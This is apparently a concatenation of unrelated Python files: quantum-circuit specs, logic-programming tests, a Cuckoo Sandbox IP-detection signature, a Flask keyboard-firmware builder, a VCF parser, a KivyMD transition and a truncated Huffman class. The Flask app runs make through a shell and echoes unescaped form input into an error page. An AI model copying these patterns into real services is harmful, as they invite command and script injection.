# See the License for the specific language governing permissions and
# limitations under the License.
# The module docstring is in strawberryfields/circuitspecs/__init__.py
"""
**Module name:** :mod:`strawberryfields.circuitspecs.circuit_specs`
"""
from typing import List, Set, Dict, Union
import abc
import networkx as nx
import blackbird
from blackbird.utils import to_DiGraph
import strawberryfields.program_utils as pu
class CircuitSpecs(abc.ABC):
    """Abstract base class for describing circuit classes.

    This class stores information about :term:`classes of quantum circuits <circuit class>`.
    For some circuit classes (e.g, ones corresponding to physical hardware chips), the
    specifications can be quite rigid. For other classes, e.g., circuits supported by a particular
    simulator backend, the specifications can be more flexible and general.

    Key ingredients in a specification include: the primitive gates supported by the circuit class,
    the gates that can be decomposed to sequences of primitive gates, and the possible
    topology/connectivity restrictions.

    This information is used e.g., in :meth:`.Program.compile` for validation and compilation.
    """

    short_name = ""
    """str: short name of the circuit class"""

    @property
    @abc.abstractmethod
    def modes(self) -> Union[int, None]:
        """The number of modes supported by the circuit class.

        If the circuit class supports arbitrary number of modes, set this to 0.

        Returns:
            int: number of supported modes
        """

    @property
    @abc.abstractmethod
    def local(self) -> bool:
        """Whether the circuit class can be executed locally (i.e., within a simulator).

        Returns:
            bool: ``True`` if the circuit class supports local execution
        """

    @property
    @abc.abstractmethod
    def remote(self) -> bool:
        """Whether the circuit class supports remote execution.

        Returns:
            bool: ``True`` if the circuit class supports remote execution
        """

    @property
    @abc.abstractmethod
    def interactive(self) -> bool:
        """Whether the circuits in the class can be executed interactively, that is,
        the registers in the circuit are not reset between engine executions.

        Returns:
            bool: ``True`` if the circuit supports interactive use
        """

    @property
    @abc.abstractmethod
    def primitives(self) -> Set[str]:
        """The primitive set of quantum operations directly supported
        by the circuit class.

        Returns:
            set[str]: the names of the quantum primitives the circuit class supports
        """

    @property
    @abc.abstractmethod
    def decompositions(self) -> Dict[str, Dict]:
        """Quantum operations that are not quantum primitives for the
        circuit class, but are supported via specified decompositions.

        This should be of the form

        .. code-block:: python

            {'operation_name': {'option1': val, 'option2': val,...}}

        For each operation specified in the dictionary, the
        :meth:`.Operation.decompose` method will be called during
        :class:`.Program` compilation, with keyword arguments
        given by the dictionary value.

        Returns:
            dict[str, dict]: the quantum operations that are supported
            by the circuit class via decomposition
        """

    @property
    def parameter_ranges(self) -> Dict[str, List[List[float]]]:
        """Allowed parameter ranges for supported quantum operations.

        This property is optional.

        Returns:
            dict[str, list]: a dictionary mapping an allowed quantum operation
            to a nested list of the form ``[[p0_min, p0_max], [p1_min, p1_max], ...]``.
            where ``pi`` corresponds to the ``i`` th gate parameter
        """
        return dict()

    @property
    def graph(self):
        """The allowed circuit topologies or connectivity of the class, modelled as a directed
        acyclic graph.

        This property is optional; if arbitrary topologies are allowed in the circuit class,
        this will simply return ``None``.

        Returns:
            networkx.DiGraph: a directed acyclic graph
        """
        if self.circuit is None:
            return None

        # returned DAG has all parameters set to 0
        bb = blackbird.loads(self.circuit)

        if bb.is_template():
            params = bb.parameters
            kwargs = {p: 0 for p in params}

            # initialize the topology with all template
            # parameters set to zero
            topology = to_DiGraph(bb(**kwargs))

        else:
            topology = to_DiGraph(bb)

        return topology

    @property
    def circuit(self):
        """A rigid circuit template that defines this circuit specification.

        This property is optional. If arbitrary topologies are allowed in the circuit class,
        **do not define this property**. In such a case, it will simply return ``None``.

        If a backend device expects a specific template for the received Blackbird
        script, this method will return the serialized Blackbird circuit in string
        form.

        Returns:
            Union[str, None]: Blackbird program or template representing the circuit
        """
        return None

    def compile(self, seq, registers):
        """Class-specific circuit compilation method.

        If additional compilation logic is required, child classes can redefine this method.

        Args:
            seq (Sequence[Command]): quantum circuit to modify
            registers (Sequence[RegRefs]): quantum registers

        Returns:
            List[Command]: modified circuit

        Raises:
            CircuitError: the given circuit cannot be validated to belong to this circuit class
        """
        # `registers` is not used here, but may be used if the method is
        # overwritten. pylint: disable=unused-argument
        if self.graph is not None:
            # check topology
            DAG = pu.list_to_DAG(seq)

            # relabel the DAG nodes to integers, with attributes
            # specifying the operation name. This allows them to be
            # compared, rather than using Command objects.
            mapping = {i: n.op.__class__.__name__ for i, n in enumerate(DAG.nodes())}
            circuit = nx.convert_node_labels_to_integers(DAG)
            nx.set_node_attributes(circuit, mapping, name="name")

            def node_match(n1, n2):
                """Returns True if both nodes have the same name"""
                return n1["name"] == n2["name"]

            # check if topology matches
            if not nx.is_isomorphic(circuit, self.graph, node_match):
                # TODO: try and compile the program to match the topology
                # TODO: add support for parameter range matching/compilation
                raise pu.CircuitError(
                    "Program cannot be used with the CircuitSpec '{}' "
                    "due to incompatible topology.".format(self.short_name)
                )

        return seq

    def decompose(self, seq):
        """Recursively decompose all gates in a given sequence, as allowed
        by the circuit specification.

        This method follows the directives defined in the
        :attr:`~.CircuitSpecs.primitives` and :attr:`~.CircuitSpecs.decompositions`
        class attributes to determine whether a command should be decomposed.

        The order of precedence to determine whether decomposition
        should be applied is as follows.

        1. First, we check if the operation is in :attr:`~.CircuitSpecs.decompositions`.
           If not, decomposition is skipped, and the operation is applied
           as a primitive (if supported by the ``CircuitSpecs``).

        2. Next, we check if (a) the operation supports decomposition, and (b) if the user
           has explicitly requested no decomposition.

           - If both (a) and (b) are true, the operation is applied
             as a primitive (if supported by the ``CircuitSpecs``).

           - Otherwise, we attempt to decompose the operation by calling
             :meth:`~.Operation.decompose` recursively.

        Args:
            seq (list[strawberryfields.program_utils.Command]): list of commands to
                be decomposed

        Returns:
            list[strawberryfields.program_utils.Command]: list of compiled commands
            for the circuit specification
        """
        compiled = []
        for cmd in seq:
            op_name = cmd.op.__class__.__name__
            if op_name in self.decompositions:
                # target can implement this op decomposed
                if hasattr(cmd.op, "decomp") and not cmd.op.decomp:
                    # user has requested application of the op as a primitive
                    if op_name in self.primitives:
                        compiled.append(cmd)
                        continue
                    else:
                        raise pu.CircuitError(
                            "The operation {} is not a primitive for the target '{}'".format(
                                cmd.op.__class__.__name__, self.short_name
                            )
                        )
                try:
                    kwargs = self.decompositions[op_name]
                    temp = cmd.op.decompose(cmd.reg, **kwargs)
                    # now compile the decomposition
                    temp = self.decompose(temp)
                    compiled.extend(temp)
                except NotImplementedError as err:
                    # Operation does not have _decompose() method defined!
                    # simplify the error message by suppressing the previous exception
                    raise err from None

            elif op_name in self.primitives:
                # target can handle the op natively
                compiled.append(cmd)

            else:
                raise pu.CircuitError(
                    "The operation {} cannot be used with the target '{}'.".format(
                        cmd.op.__class__.__name__, self.short_name
                    )
                )

        return compiled
|
import ast
from types import FunctionType
from kanren import var
from tests.helpers import EvaloTestCase
class TestExpressions(EvaloTestCase):
    """Tests for relational (forward and reverse) evaluation of Python AST
    expressions: run_expr either evaluates a concrete AST to a value, or,
    given a value and a logic variable for the AST, enumerates ASTs that
    evaluate to it (eval_expr=True)."""

    def test_number_value_results_in_ast_number(self):
        ret, _ = self.run_expr(var(), 1, eval_expr=True)
        self.assertIsInstance(ret[0], ast.Num)

    def test_number_value_results_in_maximum_number_of_possibilities(self):
        ret, _ = self.run_expr(var(), 1, eval_expr=True)
        self.assertEqual(len(ret), 5)

    def test_asts_can_be_partially_filled_in(self):
        # A logic variable inside an otherwise concrete AST gets unified.
        ret, _ = self.run_expr(
            ast.BinOp(left=ast.Num(n=1), op=ast.Add(), right=ast.Num(n=var())),
            3,
            eval_expr=True,
        )
        self.assertEqual(ret[0].right.n, 2)

    def test_ast_addition_results_in_var_integer(self):
        ret, _ = self.run_expr(
            ast.BinOp(left=ast.Num(n=1), op=ast.Add(), right=ast.Num(n=1)), var()
        )
        self.assertEqual(ret[0], 2)

    def test_ast_subtraction_results_in_var_integer(self):
        ret, _ = self.run_expr(
            ast.BinOp(left=ast.Num(n=1), op=ast.Sub(), right=ast.Num(n=1)), var()
        )
        self.assertEqual(ret[0], 0)

    def test_ast_multiplication_results_in_var_integer(self):
        ret, _ = self.run_expr(
            ast.BinOp(left=ast.Num(n=2), op=ast.Mult(), right=ast.Num(n=1)), var()
        )
        self.assertEqual(ret[0], 2)

    # Float is not yet supported
    # def test_ast_division_results_in_var_integer(self):
    #     ret, _ = self.run_expr(ast.Expr(value=ast.BinOp(left=ast.Num(n=2), op=ast.Div(), right=ast.Num(n=1))), var())
    #     self.assertEqual(ret[0], 1)

    def test_ast_modulo_results_in_var_integer(self):
        ret, _ = self.run_expr(
            ast.BinOp(left=ast.Num(n=3), op=ast.Mod(), right=ast.Num(n=2)), var()
        )
        self.assertEqual(ret[0], 1)

    def test_ast_modulo_with_rhs_zero_is_not_picked_up(self):
        # Division by zero must yield no solutions rather than raising.
        ret, _ = self.run_expr(
            ast.BinOp(left=ast.Num(n=3), op=ast.Mod(), right=ast.Num(n=0)), var()
        )
        self.assertEqual(len(ret), 0)

    def test_ast_string_results_in_var_string(self):
        ret, _ = self.run_expr(ast.Str(s="Hello world!"), var())
        self.assertEqual(ret[0], "Hello world!")

    # TODO: n=1 because otherwise it's very slow. Not sure why
    def test_string_value_results_in_ast_string(self):
        ret, _ = self.run_expr(var(), "Hello world!", eval_expr=True, n=1)
        self.assertIn(type(ret[0]), [ast.Str, ast.Constant])  # Can be Constant in 3.8+
        self.assertEqual(ret[0].s, "Hello world!")

    def test_ast_name_results_in_lookup_from_env(self):
        ret, _ = self.run_expr(ast.Name(id="x", ctx=ast.Load()), var(), env=[["x", 1]])
        self.assertEqual(ret[0], 1)

    def test_ast_lambda_without_args_results_in_function_type(self):
        ret, _ = self.run_expr(ast.Lambda(args=[], body=ast.Num(n=1)), var(), env=[])
        self.assertEqual(type(ret[0]), FunctionType)

    def test_ast_call_with_lambda_results_in_function_call(self):
        ret, _ = self.run_expr(
            ast.Call(func=ast.Lambda(args=[], body=ast.Num(n=1)), args=[], keywords=[]),
            var(),
            env=[],
        )
        self.assertEqual(ret[0], 1)

    def test_ast_empty_list_evaluates_to_empty_list(self):
        ret, goals = self.run_expr(
            ast_expr=ast.List(elts=[], ctx=ast.Load()),
            value=var(),
        )
        self.assertEqual(ret[0], [])

    def test_ast_single_element_list_is_correctly_interpreted(self):
        ret, _ = self.run_expr(
            ast_expr=ast.List(elts=[ast.Num(n=1)], ctx=ast.Load()),
            value=var(),
            maxdepth=4,
        )
        self.assertEqual(ret[0], [1])

    def test_ast_multiple_element_list_is_correctly_interpreted(self):
        ret, _ = self.run_expr(
            ast_expr=ast.List(elts=[ast.Num(n=1), ast.Num(n=3)], ctx=ast.Load()),
            value=var(),
            maxdepth=4,
        )
        self.assertEqual(ret[0], [1, 3])

    def test_ast_nested_list_is_correctly_interpreted(self):
        ret, _ = self.run_expr(
            ast_expr=ast.List(
                elts=[ast.Num(n=2), ast.List(elts=[ast.Num(n=1)], ctx=ast.Load())],
                ctx=ast.Load(),
            ),
            value=var(),
            maxdepth=4,
        )
        self.assertEqual(ret[0], [2, [1]])

    def test_empty_list_can_be_reverse_interpreted(self):
        # Round-trip: every generated AST must evaluate back to the value.
        ret, _ = self.run_expr(var(), [], eval_expr=True, n=3)
        for r in ret:
            v, _ = self.run_expr(r, var(), n=1)
            self.assertEqual(v[0], [])

    def test_filled_list_can_be_reverse_interpreted(self):
        ret, _ = self.run_expr(var(), [1], eval_expr=True, n=3)
        for r in ret:
            v, _ = self.run_expr(r, var(), n=1)
            self.assertEqual(v[0], [1])
|
# Copyright (C) 2010-2015 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# This signature was contributed by RedSocks - http://redsocks.nl
# See the file 'docs/LICENSE' for copying permission.
from lib.cuckoo.common.abstracts import Signature
class im_btb(Signature):
    """Marks an IOC for every contacted IP that belongs to the known
    BitTorrent Bleep chat server list."""

    name = "im_btb"
    description = "Connects to BitTorrent Bleepchat IP"
    severity = 2
    categories = ["im"]
    authors = ["RedSocks"]
    minimum = "2.0"

    ipaddrs = [
        "23.21.70.220",
        "54.243.240.224",
        "54.225.243.50",
        "54.225.152.58",
        "54.235.137.132",
        "54.204.31.170",
        "54.230.12.225",
        "107.21.220.158",
        "103.7.30.140",
        "112.95.234.84",
        "183.60.18.111",
        "54.235.164.20",
    ]

    def on_complete(self):
        matched = [addr for addr in self.ipaddrs if self.check_ip(pattern=addr)]
        for addr in matched:
            self.mark_ioc("ipaddr", addr)
        return self.has_marks()
|
# coding: utf8
import os, subprocess, datetime, fileinput
from flask import Flask, flash, request, redirect, url_for, send_from_directory
import common as kbd
KEYBOARDS = []
# import keyboard configurations and add them to app keyboard list
from keyboards.minivan import keyboard as minivan_rev1
KEYBOARDS.append(minivan_rev1)
from keyboards.minivan_rev3 import keyboard as minivan_rev3
KEYBOARDS.append(minivan_rev3)
from keyboards.roadkit import keyboard as roadkit
KEYBOARDS.append(roadkit)
from keyboards.transitvan import keyboard as transitvan
KEYBOARDS.append(transitvan)
from keyboards.provan import keyboard as provan
KEYBOARDS.append(provan)
from keyboards.minorca import keyboard as minorca
KEYBOARDS.append(minorca)
from keyboards.ergodox import keyboard as ergodox
KEYBOARDS.append(ergodox)
from keyboards.caravan import keyboard as caravan
KEYBOARDS.append(caravan)
from keyboards.lowwriter import keyboard as lowwriter
KEYBOARDS.append(lowwriter)
from keyboards.bananasplit import keyboard as bananasplit
KEYBOARDS.append(bananasplit)
app = Flask(__name__)
# Returns the file to download at the very end
@app.route('/downloads/<firmware>/<filename>')
def download_file(filename, firmware):
    """Serve a built firmware file from the given firmware's build directory."""
    build_dir = "/app/tmk_keyboard/keyboard/{0}".format(firmware)
    return send_from_directory(build_dir, filename)
# This is our main routine. it allows GET and POST requests. If we get a GET request, we just send our template file
# to the browser (at the very end of the function) If it's a POST request, it means the browser already has our
# template and wants to send the values back to us. We do some sanity checks first to see if everything is ok The
# other steps we take will be explained right before everything.
@app.route('/', methods=['GET', 'POST'])
def main():
    """Main configurator route.

    GET: serve the frontend template.
    POST: read the submitted layer configuration, render a keymap C file,
    build the firmware with make, and redirect to the hex download.
    """
    if request.method != 'POST':
        # This is what happens on a GET request: just send the index.html file.
        return send_from_directory("/app/frontend/", "index.html")

    # As soon as we get a POST request we remember the current time so every
    # generated config gets a unique name (1 request per second should be
    # enough to not run into collisions for now).
    now = str(datetime.datetime.now()).replace(' ', '-').replace(':', '-').split(".")[0]

    keyboard_name = request.form.get('keyboard', '')
    keyboard = None
    for k in KEYBOARDS:
        if k.name == keyboard_name:
            keyboard = k
            break
    if keyboard is None:
        return('error: no keyboard specified')

    activeLayout = int(request.form.get('activeLayout', '0'))
    hasZones = request.form.get('hasZones', 'false') == 'true'

    # The form posts up to 15 layers as L<n>/LT<n>/LM<n> value lists.
    # Collect the non-empty ones in a loop instead of 45 hand-written
    # getlist() calls (previously layer1..layer15 were spelled out).
    layers = []
    for idx in range(1, 16):
        values = request.form.getlist('L{0}'.format(idx))
        if values:
            layers.append({
                'values': values,
                'types': request.form.getlist('LT{0}'.format(idx)),
                'mods': request.form.getlist('LM{0}'.format(idx)),
            })

    if hasZones:
        keys_per_layer = keyboard.get_num_keys(activeLayout)
        template = keyboard.get_layout(activeLayout)
    else:
        keys_per_layer = keyboard.layouts[activeLayout]['num_keys']
        template = keyboard.layouts[activeLayout]['layout']

    # Sanity check: every submitted layer must cover the whole layout.
    for layer in layers:
        if len(layer['values']) != keys_per_layer:
            return('error: some values are missing! please enter all information!')

    layers, fn_actions = kbd.buildFnActions(layers)
    for layer in layers:
        layer = kbd.makeUpper(layer)
        layer = kbd.translateList(layer)
        if not kbd.isAllowed(layer):
            return('error: there are invalid characters. please check your imput!<p>{0}</p>'.format(layer))

    keymaps = kbd.buildKeyMaps(layers, template)
    # Insert all collected values into the keymap template file.
    configfile = kbd.createTemplate(fn_actions, keymaps)

    # Write the generated config into the firmware tree under the timestamped
    # name created above. (The redundant explicit close() inside the `with`
    # block was removed; the context manager already closes the file.)
    filename = "keymap_{0}_{1}.c".format(keyboard.firmware_folder, now)
    callname = "{0}_{1}".format(keyboard.firmware_folder, now)
    keyboard_dir = "/app/tmk_keyboard/keyboard/{0}/".format(keyboard.firmware_folder)
    with open(os.path.join(keyboard_dir, filename), "w+") as templatefile:
        templatefile.write(configfile)

    # Everything is set up; build the hex file with a make call.
    # NOTE(review): shell=True with string interpolation — `callname` is built
    # server-side from the keyboard folder and a timestamp, so it is not
    # user-controlled, but a list-based subprocess.call without a shell would
    # be safer if this ever changes.
    callstring = "make KEYMAP=" + callname + " TARGETFILE=" + callname + " > /dev/null"
    subprocess.call(callstring, shell=True, cwd=keyboard_dir)

    # Done — hand the browser the download URL for the freshly built hex.
    return redirect(url_for('download_file', filename=callname + '.hex', firmware=keyboard.firmware_folder))
|
#!/usr/bin/python3
# coding:UTF8
#----library-----#
import os.path
import os
import sys
import vcf
import json
import time
import copy
import errno
import verification_vcf
#---------------#
class VcfModel(object):
    """In-memory model of a VCF file parsed with PyVCF.

    Validates the file headers, then extracts metadata, contigs, INFO and
    FORMAT declarations, the sample names and all variant records, and can
    serialize any of these to JSON.
    """

    # Constant dict/JSON keys used by the extraction and export methods.
    SAMPLE_NAME = "SAMPLE_NAME"
    CONTIGS = "CONTIGS"
    FORMAT = "FORMAT"
    INFORMATION = "INFORMATIONS"
    METADATA = "METADATA"
    ANNOTATION = "ANNOTATION_?"
    VARIANTS = "VARIANTS"
    CHROM = "CHROM"
    POS = "POS"
    ID = "ID"
    REF = "REF"
    ALT = "ALT"
    QUAL = "QUAL"
    FILTER = "FILTER"
    INFO = "INFO"

    def __init__(self, vcf_file: str) -> None:
        """Validate *vcf_file*, parse it with PyVCF and run every extraction step.

        Args:
            vcf_file: path of the VCF file to load.

        Raises:
            ValueError: when fewer than two of the mandatory ``##`` header
                tags are present (previously this case only printed a
                message and crashed later with a NameError).
        """
        # --------------------------------------------------------------->
        # Check that the file looks like a valid VCF before handing it to
        # the PyVCF reader.
        vcf_a, vcf_header_a, vcf_columns_a = verification_vcf.read_vcf(vcf_file)
        vcf_columns = ['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT', 'DATA']
        for col in vcf_columns:
            if col not in vcf_columns_a:
                # "." is the conventional VCF placeholder for missing data.
                vcf_a[col] = "."
        list_header = verification_vcf.check_Vcf_Header(vcf_header_a)
        expected_tags = ["##fileformat", "##fileDate", "##source", "##reference", "##contig"]
        header_lines = verification_vcf.separation_line(list_header[0])
        dict_validation = {}
        dict_non_validation = {}
        for line in header_lines:
            for tag in expected_tags:
                if line.startswith(tag):
                    dict_validation[tag] = "Ok"
                else:
                    dict_non_validation[tag] = "Pas Ok"
        if len(dict_validation) < 2:
            raise ValueError(
                "Erreur de format de fichier : {} {}".format(
                    dict_non_validation, dict_validation))
        output_vcf = open(vcf_file)
        self.vcf_reader = vcf.Reader(output_vcf)
        # -------------------------------------------------------------->
        # Containers filled by the extraction methods below (previously
        # these were bound to the *type* objects, e.g. ``dict``).
        self.metadata = {}       # ##-header metadata lines
        self.info = {}           # kept for backward compatibility
        self.format = {}         # ##FORMAT declarations
        self.patient_name = []   # sample names found in the file
        self.dico_contig = {}    # contig name -> contig length
        self.infos = {}          # ##INFO declarations
        self.variants = {}       # variant key -> {source: record fields}
        self.annotated = False   # True when variants carry a CSQ INFO tag
        self.source = "source"   # metadata key naming the generating tool
        # Order matters: metadata must exist before the variants are read,
        # and _variant_information consumes the record iterator before
        # _is_annotated re-reads it.
        self._extract_metadata()
        self._variant_information()
        self._extract_contig()
        self._found_patient()
        self._extract_info()
        self._extract_format()
        self._is_annotated()
        output_vcf.close()

    def _extract_contig(self):
        """Extract contig names and sizes into ``self.dico_contig``.

        PyVCF stores each contig as ``name -> (name, length)``; only
        ``name -> length`` is kept.

        Args:
            self.vcf_reader: a VCFReader object
        Returns:
            void
        """
        try:
            contig = {}
            for name in self.vcf_reader.contigs:
                contig[name] = self.vcf_reader.contigs[name][1]
            self.dico_contig = contig
        except IOError as e:
            print(e.errno)

    def _extract_info(self):
        """Extract the ``##INFO`` header declarations into ``self.infos``.

        Each entry maps the INFO ID to ``[Number, Type, Description, ...]``.
        PyVCF encodes ``Number=A`` as -1 and ``Number=.`` as 0; both are
        converted back to their textual VCF form.

        Args:
            self.vcf_reader: a VCFReader object
        Returns:
            void
        """
        try:
            dict_field_info = {}
            for key in self.vcf_reader.infos:
                dict_field_info[key] = list(self.vcf_reader.infos[key][1:])
        except IOError as e:
            print(e.errno)
        try:
            for value in dict_field_info.values():
                if value[0] == -1:
                    value[0] = 'A'
                elif value[0] == 0:
                    value[0] = '.'
            self.infos = dict_field_info
        except Exception as e:
            # Exception objects have no .message attribute in Python 3.
            print(e, e.args)

    def _is_annotated(self):
        """Set ``self.annotated`` to True when variants carry a CSQ INFO tag.

        NOTE(review): by the time this runs, _variant_information has
        already consumed the record iterator, so no records may remain —
        confirm the intended behaviour with a fresh reader if annotation
        detection matters.

        Args:
            self.vcf_reader: a VCFReader object
        Returns:
            void
        """
        try:
            dico_select_info = {}
            for record in self.vcf_reader:
                for inf in record.INFO:
                    dico_select_info[inf] = record.INFO[inf]
        except Exception as e:
            print(e, e.args)
        try:
            # 'CSQ' is the tag written by annotation tools such as VEP.
            self.annotated = 'CSQ' in dico_select_info
        except Exception as e:
            print(e, e.args)

    def _found_patient(self):
        """Store the list of sample names in ``self.patient_name``.

        Args:
            self.vcf_reader: a VCFReader object
        Returns:
            void
        """
        try:
            self.patient_name = self.vcf_reader.samples
        except Exception as e:
            print(e, e.args)

    def _extract_metadata(self):
        """Copy the PyVCF metadata mapping (descriptive ``##`` lines) into
        ``self.metadata``.

        Args:
            self.vcf_reader: a VCFReader object
        Returns:
            void
        """
        try:
            self.metadata = {}
            meta = self.vcf_reader.metadata
            for key in meta:
                self.metadata[key] = meta[key]
        except Exception as e:
            print(e, e.args)

    def _extract_format(self):
        """Copy the ``##FORMAT`` declarations (optional per-sample field
        descriptions) into ``self.format``.

        Args:
            self.vcf_reader: a VCFReader object
        Returns:
            void
        """
        try:
            self.format = {}
            form = self.vcf_reader.formats
            for key in form:
                self.format[key] = form[key]
        except Exception as e:
            print(e, e.args)

    def _variant_information(self):
        """Build ``self.variants`` from the record iterator.

        Shape: ``{"CHR_POS_REF_ALT": {source: {CHROM, POS, ID, REF, ALT,
        QUAL, FILTER, INFO, FORMAT}}}`` where *source* is derived from the
        ``source`` metadata line (the variant caller).

        Args:
            self.vcf_reader: a VCFReader object
        Returns:
            void
        """
        dico_total3 = {}
        # NOTE(review): the metadata value is wrapped in tuple() before
        # str() — presumably it is a list; confirm against real files.
        source_name = str(tuple(self.metadata[self.source]))
        for record in self.vcf_reader:
            record_ALT = [str(alt) for alt in record.ALT]
            name_key = record.CHROM + "_" + str(record.POS) + "_" + record.REF + "_" + "-".join(record_ALT)
            dico_total = {}
            dico_total[self.__class__.CHROM] = record.CHROM
            dico_total[self.__class__.POS] = record.POS
            dico_total[self.__class__.ID] = record.ID
            dico_total[self.__class__.REF] = record.REF
            dico_total[self.__class__.ALT] = record_ALT
            dico_total[self.__class__.QUAL] = record.QUAL
            dico_total[self.__class__.FILTER] = record.FILTER
            dico_total[self.__class__.INFO] = record.INFO
            # Split the FORMAT template (e.g. GT:AD:GQ:PL) and pair each
            # field with the first sample's data values.
            dico_sample = {}
            sample = record.samples[0]
            format_fields = record.FORMAT.split(":")
            for idx, field in enumerate(format_fields):
                dico_sample[field] = str(sample.data[idx])
            dico_total["FORMAT"] = dico_sample
            dico_total3[str(name_key)] = {source_name: dico_total}
        self.variants = dico_total3

    def variants_to_json(self, json_filepath):
        """Write the sample name and all variants to *json_filepath* as JSON.

        Args:
            json_filepath: a str object for the json filepath. The
                corresponding file will be created.
        Returns:
            void
        """
        dico_json_variants = {
            self.__class__.SAMPLE_NAME: self.patient_name,
            self.__class__.VARIANTS: self.variants,
        }
        try:
            with open(json_filepath, "w") as json_file:
                json_file.write(json.dumps(dico_json_variants))
        except IOError as e:
            print(e.errno)

    def header_to_json(self, json_filepath):
        """Write only the header information to *json_filepath* as JSON:
        sample names, contigs, formats, infos, metadata and the
        annotation flag.

        Args:
            json_filepath: a str object for the json filepath. The
                corresponding file will be created.
        Returns:
            void
        """
        dico_json_header = {
            self.__class__.SAMPLE_NAME: self.patient_name,
            self.__class__.CONTIGS: self.dico_contig,
            self.__class__.FORMAT: self.format,
            self.__class__.INFORMATION: self.infos,
            self.__class__.METADATA: self.metadata,
            self.__class__.ANNOTATION: self.annotated,
        }
        try:
            with open(json_filepath, "w") as json_file:
                json_file.write(json.dumps(dico_json_header))
        except IOError as e:
            print(e.errno)

    def vcf_to_json(self, json_filepath):
        """Write both the headers and the variants to *json_filepath* as JSON.

        Args:
            json_filepath: a str object for the json filepath. The
                corresponding file will be created.
        Returns:
            void
        """
        dico_json_dictionary = {
            self.__class__.SAMPLE_NAME: self.patient_name,
            self.__class__.CONTIGS: self.dico_contig,
            self.__class__.FORMAT: self.format,
            self.__class__.INFORMATION: self.infos,
            self.__class__.METADATA: self.metadata,
            self.__class__.ANNOTATION: self.annotated,
            self.__class__.VARIANTS: self.variants,
        }
        try:
            with open(str(json_filepath), "w") as json_file:
                json_file.write(json.dumps(dico_json_dictionary))
        except IOError as e:
            print(e.errno)

    @classmethod
    def merge_to_json(cls, vcf_1, vcf_2, json_filepath):
        """Merge the variants of *vcf_1* and *vcf_2* and write them as JSON.

        For every variant key of *vcf_1*, the per-caller entries of both
        files are merged; when *vcf_2* lacks the key, its caller name maps
        to None.

        Args:
            vcf_1: instance of VcfModel
            vcf_2: instance of VcfModel
            json_filepath: a str object for the json filepath. The
                corresponding file will be created.
        Returns:
            void
        """
        try:
            dico_merge_variant_caller = {}
            for key_caller in vcf_1.variants:
                # BUGFIX: this classmethod referenced the undefined name
                # `self`; the fallback key now comes from vcf_2 and uses
                # the same str(tuple(...)) form as _variant_information.
                missing = {str(tuple(vcf_2.metadata[vcf_2.source])): None}
                dico_merge_variant_caller[key_caller] = {
                    **vcf_1.variants[key_caller],
                    **vcf_2.variants.get(key_caller, missing),
                }
            with open(str(json_filepath), "w") as json_file:
                json_file.write(json.dumps(dico_merge_variant_caller))
        except IOError as e:
            print(e.errno)

    def retain_all(self, vcf_1):
        """Keep only the variants of this instance that also occur in *vcf_1*.

        Iterates over the smaller of the two variant key sets for
        efficiency; the retained values always come from ``self.variants``.

        Args:
            vcf_1: instance of VcfModel
        Returns:
            void
        """
        if len(self.variants) > len(vcf_1.variants):
            source_keys = vcf_1.variants.keys()
            dest_dict = self.variants
        else:
            source_keys = self.variants.keys()
            dest_dict = vcf_1.variants
        final_variant = {}
        for key in source_keys:
            if dest_dict.get(key) is not None:
                final_variant[key] = self.variants[key]
        self.variants = final_variant
|
"""
Components/Transition
=====================
.. rubric::
A set of classes for implementing transitions between application screens.
.. versionadded:: 1.0.0
Changing transitions
--------------------
You have multiple transitions available by default, such as:
- :class:`MDFadeSlideTransition`
state one: the new screen closes the previous screen by lifting from the
bottom of the screen and changing from transparent to non-transparent;
state two: the current screen goes down to the bottom of the screen,
passing from a non-transparent state to a transparent one, thus opening the
previous screen;
.. note::
You cannot control the direction of a slide using the direction attribute.
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/transition-md-fade-slide-transition.gif
:align: center
"""
# Public API of this module.
__all__ = ("MDFadeSlideTransition",)
from kivy.animation import Animation, AnimationTransition
from kivy.uix.screenmanager import (
ScreenManager,
ScreenManagerException,
SlideTransition,
)
class MDFadeSlideTransition(SlideTransition):
    """Slide transition combined with a fade: the incoming screen lifts
    from the bottom while fading in, and on the return trip the outgoing
    screen drops while fading out. The direction is managed internally
    and cannot be set by callers."""

    # Internal phase flag, toggled after every completed transition:
    # "up" = open the new screen, "down" = close it again.
    _direction = "up"

    def start(self, instance_screen_manager: ScreenManager) -> None:
        """
        Starts the transition. This is automatically called by the
        :class:`ScreenManager`.
        """
        if self.is_active:
            raise ScreenManagerException("start() is called twice!")
        self.manager = instance_screen_manager
        # Animation driving progress 0 -> 1 over `duration` seconds.
        self._anim = Animation(d=self.duration, s=0)
        self._anim.bind(
            on_progress=self._on_progress, on_complete=self._on_complete
        )
        # NOTE(review): both branches add screen_in; only the "down" phase
        # also re-adds screen_out -- confirm the asymmetry is intentional.
        if self._direction == "up":
            self.add_screen(self.screen_in)
        else:
            self.add_screen(self.screen_in)
            self.add_screen(self.screen_out)
        # Reset per-screen transition bookkeeping and fire the
        # pre-enter/pre-leave events before the animation starts.
        self.screen_in.transition_progress = 0.0
        self.screen_in.transition_state = "in"
        self.screen_out.transition_progress = 0.0
        self.screen_out.transition_state = "out"
        self.screen_in.dispatch("on_pre_enter")
        self.screen_out.dispatch("on_pre_leave")
        self.is_active = True
        self._anim.start(self)
        self.dispatch("on_progress", 0)
        if self._direction == "up":
            # Start the incoming screen hidden (transparent) at the bottom.
            self.screen_in.y = 0
            self.screen_in.opacity = 0

    def on_progress(self, progression: float) -> None:
        """Per-tick update of position and opacity (eased with out_quad)."""
        progression = AnimationTransition.out_quad(progression)
        if self._direction == "up":
            # Raise screen_in from below the manager while fading it in.
            self.screen_in.y = (
                self.manager.y + self.manager.height * progression
            ) - self.screen_in.height
            self.screen_in.opacity = progression
        if self._direction == "down":
            # Lower screen_out below the manager while fading it out.
            self.screen_out.y = (
                self.manager.y - self.manager.height * progression
            )
            self.screen_out.opacity = 1 - progression

    def on_complete(self) -> None:
        """Flip the phase so the next start() performs the opposite motion."""
        if self._direction == "down":
            self._direction = "up"
        else:
            self._direction = "down"
        super().on_complete()
|
from queue import Queue
class Node:
    """A Huffman-tree node: a character with its frequency count and two
    child links (leaf nodes carry a character, internal nodes carry None)."""

    def __init__(self, char, count):
        self.ch = char   # character for leaves, None for internal nodes
        self.ct = count  # frequency count of the subtree
        self.lt = None   # left child
        self.rt = None   # right child

    def __repr__(self):
